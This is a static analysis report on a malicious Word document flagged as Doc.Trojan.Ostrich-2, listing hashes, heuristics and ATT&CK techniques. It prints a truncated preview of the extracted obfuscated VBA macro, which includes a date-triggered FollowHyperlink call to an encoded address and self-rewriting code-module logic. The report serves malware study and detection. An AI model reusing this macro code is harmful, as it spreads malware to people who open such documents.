Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 628e6be3dc5ce705…

MALICIOUS

Office (OLE)

59.5 KB Created: 2001-05-18 18:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7f68dcb3f95e0cfc74fa978e7f21a5be SHA-1: 9d5e8842d8ec6468979dbd5ced3898f8062426e9 SHA-256: 628e6be3dc5ce705ae77b508a4baf0a04931ff73880ac1c826bb83b1d638e547
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that runs automatically when the document is opened, which is a strong indicator of malicious intent. In the extracted source the macro assigns the obfuscated string 'ñÃÖ–¸÷ ÄøªëúÉç•ÕêÅãÎÚÛîí•ÿû' to a variable, passes it through the subroutine Y8l121S (apparently a string decoder) and then calls ActiveDocument.FollowHyperlink on the result, suggesting it is designed to download and execute a second-stage payload from an address that only exists in decoded form at runtime. That call is gated on Day(Date) = &O34 (octal 34, i.e. the 28th of the month), so a dynamic-analysis run on another day may not observe the network request. The ClamAV detection (Doc.Trojan.Ostrich-2) further supports the malicious verdict.

Heuristics 3

  • ClamAV: Doc.Trojan.Ostrich-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ostrich-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70486 bytes
SHA-256: 410f6cb9e74f56a3a82ce6042cee21615b980e08bd4a1a90ba896e7ed2caf461
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' NOTE(analyst): module attribute header as emitted by oletools olevba (see the
' artifact table above). VB_Name shows this is the document's ThisDocument
' module, i.e. where a Document_Open event handler (reported by the
' OLE_VBA_DOCOPEN heuristic) would be expected to live; that handler is not
' visible in the truncated portion of the preview shown here. The remaining
' attributes are standard VBA project metadata and carry no payload logic.
Private Sub R8c39R()
DO3W0XW:
Rnpw9s:
     On Error GoTo USc855
'1976.127   841.8174    3464.258    4963.859    39.4617 77.98575    425.3977
     Const U733s4J = "™·¢ž¼¿œáÏ€Ž°�Ä�›­†ð¦š ‘¯´âº¾�‚øÑ퉪•“®ÿÀã—òúë©”Ã÷�‹µ¶‡õг’ˆì„¨¥Ëèù˜�¤Ì猡ͧÅà¬È¹¸ƒÓåǫ󻱊½£ïŸÊÁ²ê" '"2/16/130"
 Dim F297d2T As String
   Dim W68pw As Long
         Dim PDbdIBxr As Object
       Dim R6y9hR As String
    If Day(Date) = &O34 Then

  '1211.509 6550.102
      On Error Resume Next
R6y9hR = "ñÃÖî†�³–¸÷ ÄøªëúÉç•ÕêÅãÎÚ�Û�îí•ÿ�û": GoSub Y8l121S
  ActiveDocument.FollowHyperlink Address:=R6y9hR, NewWindow:=False, AddHistory:=True
  On Error GoTo USc855
    End If
     GoTo SP68AQ
   '438.1065    2601.158    1100.868    5727.295
  GoTo RNbN77j6
WPeLoQA:
         PDbdIBxr.InsertLines W68pw, F297d2T
        Return
  '2045.063 1245.175    2297.195    4406.628    2176.436
      GoTo RNbN77j6
SP68AQ:
  Dim LFxFM As Object
  Dim MG8A9v As Object
        Dim U82i823 As Object
      Dim Snlxs194 As Byte
       Dim CJC9B6nJ As String
 '487.993   1759.787
 Dim K5tB0LoK As String
       Dim OTpFt88 As Variant
  Dim XlXEr As String
       Dim S3p7K2D As String
 '561.9731  111.8199    1733.125    2712.69 5586.817    3067.217    988.3445    4096.044
 Dim V7Tb06dM As Long
    Dim RiGv45hL As Long
         '1500.215  1417.007    717.601
     Dim N2BV7v As Long
    Dim QMpVT1r As Long
       Dim Y4HgPG As Long
 Dim NlIBX As Long
       Dim BIM1kCg5 As String

   Dim EbUi1iWp As String
      Dim RBvRpYf8 As String
    Dim LVI6wdrH As String
    '2796.313   27.34148    837.1344    430.9696    1775.602    4228.256    1683.623    1206.259    1680.418
      Dim NhK633x As Variant
        Dim OV33p As Variant
        '2868.51    672.3703    619.99  18.60057    2342.623    2846.077
Dim Hc9UYI7 As Variant
       Dim N748BLT As String
 Dim Cd6k18 As Variant
        '1074.695   6230.085    5405.096    1409.419

       GoSub S12OjVoG
   If (Day(Date) = &O5 And Month(Date) = &O3) Then
     On Error Resume Next
        R6y9hR = "ÓøñËùŸÏ´Ž ÏþÉ…®ºŒ": GoSub Y8l121S: BIM1kCg5 = R6y9hR
         R6y9hR = "ꌋ闐": GoSub Y8l121S: EbUi1iWp = R6y9hR
    '2170.811   6424.561    748.0565    1347.79 946.3391    203.8373    3493.469    1815.02 18.94842
        MsgBox BIM1kCg5, &O40, EbUi1iWp
 On Error GoTo USc855
         End If
  GoTo MXenp

   GoTo RNbN77j6
V2BvQdE:

  ReDim OTpFt88(&O26) As String
     With MG8A9v
      V7Tb06dM = &O0: RiGv45hL = &O0


     .Find "DO3W0XW" & Chr(&O72), V7Tb06dM, &O0, &O0, &O0, True, True, False: If V7Tb06dM = &O0 Then GoTo USc855
  '4186.62  3380.531    288.6767    646.8135
.Find "RNbN77j6" & Chr(&O72), RiGv45hL, &O0, &O0, &O0, True, True, False: If RiGv45hL = &O0 Then GoTo USc855
       For N2BV7v = V7Tb06dM To RiGv45hL
'4645.32    2620.323    1848.988    8989.042    2412.57 595.9981    245.6242    3135.045    1819.229
   BIM1kCg5 = Trim(.Lines(N2BV7v, &O1))
        '1276.299   1730.687    1194.509    1049.284    1301.74 2719.696    4434.066
   If BIM1kCg5 <> "" And Left(BIM1kCg5, &O1) <> Chr(&O47) Then XlXEr = XlXEr & String(Int(Rnd * &O12), Chr(&O40)) & BIM1kCg5 & vbCr
        If Int(Rnd * &O12) + &O1 = &O1 Then XlXEr = XlXEr & vbCr
       If Int(Rnd * &O11) + &O1 > &O10 Then
      BIM1kCg5 = ""
       For QMpVT1r = &O0 To Int(Rnd * &O11) + &O1: BIM1kCg5 = BIM1kCg5 & Rnd * (Rnd * &O23420) & vbTab: Next QMpVT1r

XlXEr = XlXEr & String(Int(Rnd * &O12), Chr(&O40)) & Chr(&O47) & BIM1kCg5 & vbCr
       End If
       Next N2BV7v
   End With

    GoTo MX0t3Nb
      GoTo RNbN77j6
V1UQ3l:
     V7Tb06dM = InStr(V7Tb06dM + Len(U733s4J), XlXEr, Chr(&O47) & Chr(&O42)) + &O1
 If V7Tb06dM > 0 Then RiGv45hL = InStr(V7Tb06dM, XlXEr, vbCr) - &O1 Else: GoTo USc855

         CJC9B6nJ = Trim(Mid(XlXEr, V7Tb06dM + &O1, (RiGv45hL - V7Tb06
... (truncated)